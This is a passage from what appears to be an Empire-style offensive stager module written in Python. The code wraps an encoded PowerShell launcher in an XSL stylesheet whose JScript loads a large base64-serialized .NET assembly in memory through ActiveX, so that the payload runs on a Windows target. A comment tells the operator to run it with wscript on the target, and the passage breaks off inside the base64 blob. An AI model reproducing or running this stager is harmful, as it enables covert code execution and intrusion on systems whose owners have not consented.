'/tmp/launcher.xsl' }, 'UserAgent': { 'Description': 'User-agent string to use for the staging request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'Proxy': { 'Description': 'Proxy to use for request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'ProxyCreds': { 'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required': False, 'Value': 'default' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] base64 = self.options['Base64']['Value'] obfuscate = self.options['Obfuscate']['Value'] obfuscateCommand = self.options['ObfuscateCommand']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] encode = False if base64.lower() == "true": encode = True obfuscateScript = False if obfuscate.lower() == "true": obfuscateScript = True # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=encode, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) launcher = launcher.replace("powershell -noP -sta -w 1 -enc ","") if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: code = """<?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> <output method="text"/> <ms:script implements-prefix="user" language="JScript"> <![CDATA[ """ code +="var EncodedPayload = \"" + launcher + "\"\n" code += """ /* Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer. */ function setversion() { } function debug(s) {} function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var length = enc.GetByteCount_2(b); var ba = enc.GetBytes_4(b); var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); ba = transform.TransformFinalBlock(ba, 0, length); var ms = new ActiveXObject("System.IO.MemoryStream"); ms.Write(ba, 0, (length / 4) * 3); ms.Position = 0; return ms; } var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAHoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAIvEzWQAAAAAA"+ "AAAA4AAiIAsBMAAAcgAAAAYAAAAAAADGkQAAACAAAACgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ "AAAAAAAAAOAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAdJEA"+ "AE8AAAAAoAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAwAAADAAAADyQAAAcAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ "AAAALnRleHQAAADMcQAAACAAAAByAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAACg"+ "AAAABAAAAHQAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAwAAAAAIAAAB4AAAAAAAAAAAA"+ "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAKiRAAAAAAAASAAAAAIABQBIPQAA9FIAAAEAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAB4AAAAB"+ "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"+ "EQYAAheSEQYAiRGSEQYAUhCqFxIAKhMCEQYAfhOSEQYAUROSEQoAxgiQFAYAOQCSEQAAAAC7AAAA"+ "AAABAAEAAQAQAGocAABBAAEAAQAAABAAOgkAAEEAAgAEAAAAEACgHAAAcQAIAA0AAAAQAOUGAACB"+ "AA4AHwABABAA+BcAAEEADwA3AAAAEAAkBwAAkQATAD8AgQEQAEQCAABBABMAWQChAAAAmhsAAAAA"+ "EwB5AAEAEACbGwAAQQATAHkAAQAQAHYbAABBABcAggCBARAAWxcAAEEAGwCLAAsBEgC5AgAAwQAb"+ "AIwAAgEAAHEOAADxACAAjAACAQAAWA4AAPEAKQCMAAIAEACXGQAAQQA7AIwAAgAQAHsZAABBAEIA"+ "mwCDARAATRcAAEEASgCsAAMBEAABAAAAQQBPALYAAgEAAMEHAADxAFAAuAAKABAAuQIAAEEAVQC4"+ "ABEAmBVIBQEAXRtMBQEAFghPBQEApxxSBQMANwdWBQEARxFaBQEARRBeBQYAXAdWBREAqgRhBQEA"+ "XhFIBQEA7xNlBQEA2RNlBQEA+QZpBQEALhBtBVOAxQ9kAlOADh1kAlOALQtkAlOAIh1kAgEAswVk"+ 